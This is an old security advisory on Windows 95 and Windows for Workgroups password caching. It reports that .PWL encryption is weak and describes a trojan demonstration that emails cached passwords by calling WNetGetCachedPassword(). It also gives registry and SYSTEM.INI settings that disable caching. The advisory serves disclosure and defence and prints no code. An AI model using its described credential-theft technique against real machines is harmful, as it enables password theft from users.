DATE: COMMAND SOURCE: AUTHOR: Password caching SYSTEMS AFFECTED Win 95, WfW PROBLEM This text is taken from the "Hack Microsoft" Web Site and is writen By Frank Andrew Stevenson and Peter Gutmann By default, Windows 95 and Windows for Workgroups implement a "password caching feature" whereby the passwords for all network services (NetWare, NT, Samba, SLIP/PPP service) are automatically and permanently stored in C:\WINDOWS\<USERNAME>.PWL. Microsoft claims they are encrypted securely. Peter determined that the Windows PWL encryption algorithm was incredibly insecure. Frank wrote a program to break the .PWL files in Windows. (More details are forthcoming, a draft version is available currently.) Source code and a Windows NT executable for the exploit program are available. In effect, anyone with physical or network access to a Windows machine has access to all network passwords used by all users of that machine. Late afternoon December 14th, Microsoft released an alleged fix for the problem, which is supposed to make passwords harder to find, but it has not been reviewed by outside experts, and it doesn't even come with a ReadMe file. Unlike Netscape, Microsoft has not published its encryption algorithm for the customary peer review. Until they do, we recommend disabling password caching and user profiles. Peter wrote this modest trojan horse demonstration, mail.zip. Invoke it as mail firstname.lastname@example.org (or whatever address you consider appropriate) on any Windows for Workgroups machine with a TCP/IP connection and it will send you (or anyone else) the first password cached on your machine, unencrypted. Note that this hack does not contain any decryption code; it merely uses the WNetGetCachedPassword() call, which is available to any program. Proper security architectures, such as the corresponding subsystem in Windows NT, have an internal security perimeter to prevent this kind of thing. This quick hack doesn't support MX aliasing, so you might need to point it directly at your SMTP server. Because some network calls do not seem to be supported in Windows 95, this program currently only works with WFW (but this is only a minor implementation issue, which could be fixed). "Disabling password caching" does not completely address this vulnerability, because passwords are still stored in memory to facilitate the "automatic reconnect" feature, which is designed to maintain connections through laptop "suspend" mode and temporary network problems. Neither is the alleged fix for Windows 95 (above) relevant. EXPLOIT SOLUTION Don't allow your network administrators to log on to workstations with the "administrator" account under any circumstances. When you log on to a standard Windows workstation, you user passwords are cached -- unless this feature has been disable. Thanks to Jim Carlson for contributing this WfW semi-fix: To turn off password caching for Windows for Workgroups, add the following to your \WINDOWS\SYSTEM.INI file: [NETWORK] passwordcaching=no Thanks to Malcolm Miles for contributing this Win95 semi-fix: To turn off password caching for Win95, you can use Policy Editor, or edit the following Registry entry directly with REGEDIT.EXE: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Network\DisablePwdCaching Set the value to a binary value of 1.